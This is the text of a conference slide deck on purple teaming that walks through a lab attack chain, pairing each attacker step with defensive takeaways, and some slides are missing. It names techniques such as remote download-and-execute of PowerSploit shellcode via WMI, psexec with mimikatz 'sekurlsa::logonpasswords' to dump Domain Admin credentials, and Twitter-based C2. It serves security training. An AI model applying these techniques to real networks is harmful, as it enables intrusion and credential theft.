The recent trend of using Attack and Defense Together.
Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), Defensive (blue team) and mixing the two.
1. Purple View
The recent trend of using Attack and Defense
Together
Not OUR idea - backed by many
@raffertylaura | @haydnjohnson
2. Quick who are we
Haydn Johnson
@haydnjohnson
OSCP
Offensive/Attack Interest
Enjoys presenting
Laura
@raffertylaura
MSc Computer Science
(Security/Privacy)
Interested in both sides of security
Loooooves presenting
@raffertylaura | @haydnjohnson
3. Contents
1. Basic Term Definition
2. Introduction to Red, Blue and Purple
3. Run through of an Attack
○ Gaining Access
○ Lateral Movement
○ Domain Admin
○ Maintaining Access
○ Data Exfiltration
4. For each attack:
○ Attacking View
○ Defenders View
○ Possible Purple Team exercises
@raffertylaura | @haydnjohnson
4. Definitions
Exploit - The thing used to gain unauthorized access to a system
Payload - What is done after the access is gained (shell, command)
Metasploit - An open source exploit framework, modular
Meterpreter - an advanced, extensible payload that uses in-memory DLL injection
Shell - Gaining Terminal/CMD access remotely
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
http://www.metasploit.com/
5. Red Team - Penetration | Offensive
● Scans
● Exploits
● Logic abuse
● Access to things they shouldn’t
@raffertylaura | @haydnjohnson
6. Blue Team - Block, Prevent, Detect | Defensive
● Logs
● Emails
● Events
● Triggers
● Networking
● More Logs
@raffertylaura | @haydnjohnson
7. Red Team - Goals
● Model recent threats and trends
● Longer term
● Highlight Gaps in Security Controls, detection etc
● Escape and Evade for Persistence
@raffertylaura | @haydnjohnson
8. Blue Team - Goals
● Detect Attack
● Respond and Recover
● Produce Actionable Intelligence
● Identify Gaps and investment needs
@raffertylaura | @haydnjohnson
9. Purple Team - Offensive & Defensive
Working together to achieve the ultimate goal of making the organization more
secure
● Exposes blue team to different threats & attacker mindset
● Test incident detection and response
● Allows red team to sharpen skills
● Policy and procedures tested
● Tuning of controls
@raffertylaura | @haydnjohnson
10. Purple Team - Offensive & Defensive
Different types of Purple Teaming
● Read Team Sitting with Network Defense team
● Adversary Simulation
● Traffic Generation
● cobaltstrike.com
● Wargaming
Requires total picture involving all areas of the organization
@raffertylaura | @haydnjohnson
11. Purple Team - The difference
● Using Security Posture and Weaknesses to find what is most valuable
● Goal Oriented
● Review attack
● Test how teams use services and how they are managed
@raffertylaura | @haydnjohnson
12. Purple Team - The difference
● Time to Domain Admin
● Time to Data/Objective
● Time to Respond
● Time to Recover
● Identify where there needs to be more investment
● Measure Impact
Done right, the blue team should come out with better monitoring and response
plans.
@raffertylaura | @haydnjohnson
13. Purple Team - The difference
● Set up a fake scenario - Assume Breach
● How will the attacker gain access?
● Why have they attacked, what do they want?
● How did they move through the network?
● If they exfiltrated data, how?
Do not turn off servers, block IP addresses, make it realistic
@raffertylaura | @haydnjohnson
14. Purple Team - Exercise
“In the beginning, it’s easy to challenge and exercise a network defense team. You
will find that many network defenders do not have a lot of experience (actively)
dealing with a sophisticated adversary.”
- Raphael Mudge
http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/
@raffertylaura | @haydnjohnson
15. Purple Team - DEMO (step by step)
Our exercise
@raffertylaura | @haydnjohnson
17. Tools Used
Red Team:
● Kali Linux
● Metasploit
● Meterpreter
● PowerSploit
● Twittor
Blue Team:
● Wireshark
● Windows Event Logs
@raffertylaura | @haydnjohnson
20. Flash Exploits
@raffertylaura | @haydnjohnson
● Flash plugins are vulnerable
○ You can embed a javascript/binary within a Flash file
○ ActionScript to define events to redirect to landing page
● Most exploit kit landing pages redirect to pages containing Flash exploits
○ Angler
○ Nuclear
○ Fiesta
● Installed by default on browser
● New vulnerabilities are identified on almost a weekly basis
30. B: What can you take away
Security Onion, implement it, free
Has snort rules for Flash exploits (need to install)
Confirm if flash is needed for business reasons
Keep flash updated
2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL
Cert (trojan.rules)
2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119
CnC Beacon (trojan.rules)
@raffertylaura | @haydnjohnson
https://www.security-database.com/detail.php?alert=CVE-2015-5119
https://security-onion-solutions.github.io/security-onion/
31. Purple Team - Exercise
● Blue team understands how attackers can gain initial access
● Flash exploits - ongoing issue
● Helps blue team to identify suspicious traffic and what is happening from the
attacker perspective
● Red team sees how attacks are visible by blue team and think of ways to
make it more stealthy
@raffertylaura | @haydnjohnson
37. PowerView
Part of PowerShell Empire
Very advanced
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
@raffertylaura | @haydnjohnson
38. A: Lateral Movement
The same local Administrator account passwords on multiple computers.
by Sean Metcalf
https://adsecurity.org/?p=1684
@raffertylaura | @haydnjohnson
42. A: Base64 Encoding Payload
Remove issues with whitespace
The Hacker Playbook 1 (now 2)
@raffertylaura | @haydnjohnson
http://thehackerplaybook.com/dashboard/
43. A: Hosting Powersploit Invoke--Shellcode.ps1
PowerSploit code hosted on local Kali machine
@raffertylaura | @haydnjohnson
44. A: Invoke-WmiMethod
Use powershell to connect remotely, create a new process and launch the IEX
cradle.
Calls Windows Management Instrumentation (WMI) methods.
The Win32_Process WMI class allows creation of a process.
@raffertylaura | @haydnjohnson
45. A: Execute Remote command
Execute command from Client1 to tell Client2 to download and execute shellcode
@raffertylaura | @haydnjohnson
46. A: Client1 gives same password
Same password across multiple clients
@raffertylaura | @haydnjohnson
54. B: PowerShell connects to Kali
Client2 reaches out to Kali on port 80
@raffertylaura | @haydnjohnson
55. B: What can you take away
Event Correlation - based on event ID, source and destination for remote
connections
Implement alerting based on Security Events together
SIEM can/SHOULD do this
Use Log MD - really great logging tool, especially for powershell
@raffertylaura | @haydnjohnson
http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting-
through-the-junk
http://malwarearchaeology.squarespace.com/log-md/
56. Purple Team - Benefits
● Identify ways to move around the network
● Identify and confirm Defensive Controls in Place
● Identify what worked, what did not
● Implement changes
● Justification for resources
@raffertylaura | @haydnjohnson
58. A: Local Admin to Domain Admin
@raffertylaura | @haydnjohnson
● Why escalate privileges from Local Admin to Domain Admin?
● Domain admin - control over active directory!
● Access IT resources
● Create accounts
● Propagate malware
59. A: Local Admin to Domain Admin
@raffertylaura | @haydnjohnson
60. A: Local Admin to Domain Admin
From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll
@raffertylaura | @haydnjohnson
61. A: Local Admin to Domain Admin
Use psexec to run mimikatz.exe on Client2
@raffertylaura | @haydnjohnson
62. A: Local Admin to Domain Admin
Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from
Client2!
@raffertylaura | @haydnjohnson
67. B: What can you take away
● Prevention:
○ Access control for shared drive
○ Limit access to psexec and monitor use
○ Active Directory best practices
● Detection:
○ IDS signatures
○ SIEM use case - Event correlation between system logs and network proxy logs
○ For lateral movement: enable file level auditing
○ Canary accounts
68. Purple Team - Benefits
● Blue team observes vulnerabilities/threats which may not have been
considered
○ Learns how attacker could escalate privileges from local admin to domain admin
● Red team observes the footprint left behind from this attack and possibly how
to minimize it
○ Can identify potential weaknesses in blue team monitoring/response processes
○ Provide more thorough recommendations
@raffertylaura | @haydnjohnson
77. B: Twittor - Network Traffic
Reaching out to API
Normal User Traffic??
@raffertylaura | @haydnjohnson
78. B: Twittor - Client system
Backdoor as Python Executable compiled with --no-console flag to hide output
@raffertylaura | @haydnjohnson
79. B: Traffic from Client
Reaches out to twitter
Src and Destination are internal IPs, sends to API
@raffertylaura | @haydnjohnson
80. B: What can you take away
Check if there are any remote connections after hours, is it against policy?
Again, Correlate logs with known C2 addresses
See if AV picks it up
@raffertylaura | @haydnjohnson
81. Purple Team - Benefits
Test if a C2 can reach out to twitter.
Social Media may be blocked via the browser, but some sites can still be
accessed via API etc.
If it is not blocked, why not, can your blue team help to stop this and others.
@raffertylaura | @haydnjohnson
91. B: What can you take away?
@raffertylaura | @haydnjohnson
Disable FTP - should not have a business need for it really
If there is a business need whitelist those IP addresses | Create a group of users
specifically for FTP
92. Purple Team - Exercise
Clear Text
Will any alarms trigger?
Understand potential holes in alerting
Measure time to detect and respond
@raffertylaura | @haydnjohnson
94. Purple Team - Reiteration
Provides more value than a Penetration Test
Should be implemented into a regular schedule
Helps train security personnel
Helps make sure your boxes are tuned
@raffertylaura | @haydnjohnson
95. Limitations and Future Work
● So far we have limited detection tools to Windows Server event logs and
Wireshark, (and a bit of Snort)
● Could be extended for enterprise security tools such as SIEM/IDS
● Powershell/WMI for blue team
● More advanced attacks, persistence using Powershell Empire
@raffertylaura | @haydnjohnson
98. Microsoft - 8 minute Video
https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/
@raffertylaura | @haydnjohnson
99. Seeing Purple: Hybrid Security Teams for the
Enterprise - BSides Jackson 2013
http://www.slideshare.net/beltface/hybrid-talk
@raffertylaura | @haydnjohnson
100. A: Downloads PowerShell file
Client2 reaches out to Kali machine
@raffertylaura | @haydnjohnson